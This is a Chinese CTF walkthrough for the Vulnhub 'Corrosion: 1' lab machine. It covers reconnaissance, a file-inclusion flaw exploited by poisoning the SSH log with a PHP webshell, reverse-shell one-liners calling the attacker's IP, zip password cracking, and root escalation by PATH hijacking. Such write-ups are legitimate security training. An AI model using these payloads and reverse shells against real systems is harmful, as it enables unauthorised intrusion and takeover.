Vulnhub靶机:Corrosion1

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.15)

靶机:corrosion:1(10.0.2.12)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/

二、信息收集

使用nmap主机发现靶机ip10.0.2.12

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80

在这里插入图片描述

打开网站发现是Apache2的默认页面,查看源码没有隐藏信息

在这里插入图片描述

使用dirsearch目录爆破发现一个/tasks/目录,打开发现一个txt文档

在这里插入图片描述

在这里插入图片描述

# 需要完成的任务1. 更改身份验证日志的权限
2. 更改端口 22 -> 7672
3. 设置 phpMyAdmin

没有什么可利用的点,怀疑目录扫描没有扫描到,后面使用dirbuster,使用/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt字典才扫描出来,扫描得到一个博客网站

在这里插入图片描述

在这里插入图片描述

打开http://10.0.2.12/blog-post/archives/randylogs.php页面发现是空白页面,想到tasks_todo.txt文件提示,怀疑randylogs.php可以进行文件包含,使用wfuzz进行测试,发现file参数。

wfuzz -w /usr/share/wordlists/wfuzz/general/big.txt http://10.0.2.12/blog-post/archives/randylogs.php?FUZZ=../../../../../../etc/passwd

在这里插入图片描述

三、漏洞利用

尝试包含ssh的日志文件,显示日志文件的内容

http://10.0.2.12/blog-post/archives/randylogs.php?file=/var/log/auth.log

在这里插入图片描述

由于Virtualbox上安装的kali2023.4虚拟机ssh输入特殊字符会报错,所以后续的测试使用vmware上安装的kali2022.4虚拟机操作。kali:192.168.56.103,靶机:192.168.56.104。

尝试在ssh日志写入一句话木马,执行命令失败

ssh '<?php @eval($_GET["x"]);?>'@192.168.56.104

在这里插入图片描述
在这里插入图片描述

使用system一句话木马,执行命令成功

ssh '<?php system($_GET["cmd"]);?>'@192.168.56.104

在这里插入图片描述

反弹shell

bash -i >& /dev/tcp/192.168.56.103/4444 0>&1    #反弹失败,进行url编码也反弹失败 
nc -e /bin/bash 192.168.56.103 4444  #反弹失败,进行url编码也反弹失败 
bash -c 'bash -i >& /dev/tcp/192.168.56.103/4444 0>&1'  #反弹失败,进行url编码也反弹失败 
echo "bash -i >& /dev/tcp/192.168.56.103/4444 0>&1" | bash   #反弹失败,进行url编码也反弹成功 

在这里插入图片描述

四、提权

使用命令查看具有root权限的文件,发现了两个文件

polkit-agent-helper-1:可以尝试CVE-2021-4034本地提权漏洞,需要将exp上传到靶机

easysysinfo:该文件有root权限,在randy的home目录下,所以有可能randy用户也有该文件的权限,可以尝试提权

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

首先尝试能不能将exp上传到靶机,但发现www-date的权限太低了,上传失败

在这里插入图片描述

目前没有其他可利用的点,可以找找没有什么特别的文件,搜索一些关键字,在/var/backup目录下发现user_backup.zip文件

find / -name *backup* 2>/dev/null | grep -v "/snap/"

在这里插入图片描述

使用python搭建一个临时的web服务器,主机访问将user_backup.zip文件下载下来

python3 -m http.server 9000

在这里插入图片描述

将文件解压,发现需要密码

在这里插入图片描述

使用fcrackzip工具进行爆破,得到密码

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u user_backup.zip 

在这里插入图片描述

解压发现my_password.txteasysysinfo.c文件,密码为randy用户的,使用ssh登录

在这里插入图片描述
在这里插入图片描述

查看easysysinfo.c文件,该文件内容发现setuidcat读取文件字段,可以考虑替换cat进行提权

cd /tmp/
echo '/bin/bash' > cat
chmod +x cat
export PATH=/tmp:$PATH

在这里插入图片描述
在这里插入图片描述

执行tools目录下的easysysinfo文件,提权成功

在这里插入图片描述

获取flag

在这里插入图片描述
在这里插入图片描述

参考链接:【Vulnhub 靶场】【Corrosion: 1】【简单】【20210731】-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/337958.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MongoDB快速实战与基本原理

MongoDB 介绍 什么是 MongoDB MongoDB 是一个文档数据库&#xff08;以 JSON 为数据模型&#xff09;&#xff0c;由 C 语言编写&#xff0c;旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。文档来自于“JSON Document”&#xff0c;并非我们一般理解的 PDF、WORD 文档…

构建数字化美食未来:深入了解连锁餐饮系统的技术实现

在当今数字化时代&#xff0c;连锁餐饮系统的设计与开发已成为餐饮业成功经营的重要一环。本文将深入研究连锁餐饮系统的技术实现&#xff0c;结合代码演示&#xff0c;为技术开发者和餐饮业者提供深刻的理解。 1. 技术选型与系统架构 在开始设计开发前&#xff0c;首先要考…

您的计算机已被.LIVE勒索病毒感染?恢复您的数据的方法在这里!

引言&#xff1a; 在数字时代&#xff0c;.LIVE勒索病毒如暗夜中的黑暗调&#xff0c;威胁着个人和企业的数字安全。本文将深入介绍.LIVE勒索病毒的特征&#xff0c;提供解密数据的方法&#xff0c;并讨论预防措施&#xff0c;让我们共同筑起数字世界的防护之墙。数据的重要性…

【MYSQL】MYSQL 的学习教程(十一)之 MySQL 不同隔离级别,都使用了哪些锁

聊聊不同隔离级别下&#xff0c;都会使用哪些锁&#xff1f; 1. MySQL 锁机制 对于 MySQL 来说&#xff0c;如果只支持串行访问的话&#xff0c;那么其效率会非常低。因此&#xff0c;为了提高数据库的运行效率&#xff0c;MySQL 需要支持并发访问。而在并发访问的情况下&…

CMU15-445-Spring-2023-Project #2 - B+Tree

前置知识&#xff1a;参考上一篇博文 CMU15-445-Spring-2023-Project #2 - 前置知识&#xff08;lec07-010&#xff09; CHECKPOINT #1 Task #1 - BTree Pages 实现三个page class来存储B树的数据。 BTree Page internal page和leaf page继承的基类&#xff0c;只包含两个…

软件测试|好用的pycharm插件推荐(五)——Translation

前言 在我们的日常工作中&#xff0c;经常会遇到需要查看各个第三方库源码的问题&#xff0c;在很多情况下&#xff0c;我们的英语能力不能够满足我们完全读懂源码&#xff0c;所以我们就需要借助翻译工具来帮助我们理解第三方库的源码&#xff0c;如果我们将源码复制再使用其…

使用Vivado Design Suite平台板、将IP目录与平台板流一起使用

使用Vivado Design Suite平台板流 Vivado设计套件允许您使用AMD目标设计平台板&#xff08;TDP&#xff09;创建项目&#xff0c;或者已经添加到板库的用户指定板。当您选择特定板&#xff0c;Vivado设计工具显示有关板的信息&#xff0c;并启用其他设计器作为IP定制的一部分以…

STK 特定问题建模(五)频谱分析(第一部分)

文章目录 简介一、GEO星地通信收发机设计1.1 GEO卫星仿真1.2 地面接收机仿真 二、LEO星座及天线设计 简介 本篇对卫星通信中的频谱利用率、潜在干扰对频谱的影响进行分析&#xff0c;以LEO卫星信号对GEO通信链路影响为例&#xff0c;分析星地链路频谱。 建模将从以下几个部分…

2000-2022各省、地级市风险投资(VC)数据

2000-2022各省、地级市风险投资&#xff08;VC&#xff09;数据 1、时间&#xff1a;2000-2022年 2、范围&#xff1a;350个地级市&#xff0c;34省 3、指标&#xff1a;包含投资机构层面的风险投资原始数据&#xff0c;汇总到省市层面的结果数据&#xff0c;具体指标如下&a…

2024年中国杭州|网络安全技能大赛(CTF)正式开启竞赛报名

前言 一、CTF简介 CTF&#xff08;Capture The Flag&#xff09;中文一般译作夺旗赛&#xff0c;在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会&#xff0c;以代替之前黑客们通过互相发起真实攻击进行技术比拼的…

linux 01 centos镜像下载,服务器,vmware模拟服务器

https://www.bilibili.com/video/BV1pz4y1D73n?p3&vd_source4ba64cb9b5f8c56f1545096dfddf8822 01.使用的版本 国内主要使用的版本是centos 02.centos镜像下载 这里的是centos7 一.阿里云官网地址&#xff1a;https://www.aliyun.com/ 二. -----【文档与社区】 —【…

GitLab clone 地址不对的解决办法

1丶问题描述 2丶解决方案 解决方案&#xff1a; 找到挂载到宿主机配置文件&#xff1a;gitlab.rb vi gitlab.rb 改成自己的ip 重启容器 docker restart gitlab 如果发现容器一直重启&#xff0c;可采用粗暴的方法&#xff0c;直接干掉当前容器&#xff0c;重新运行一个 …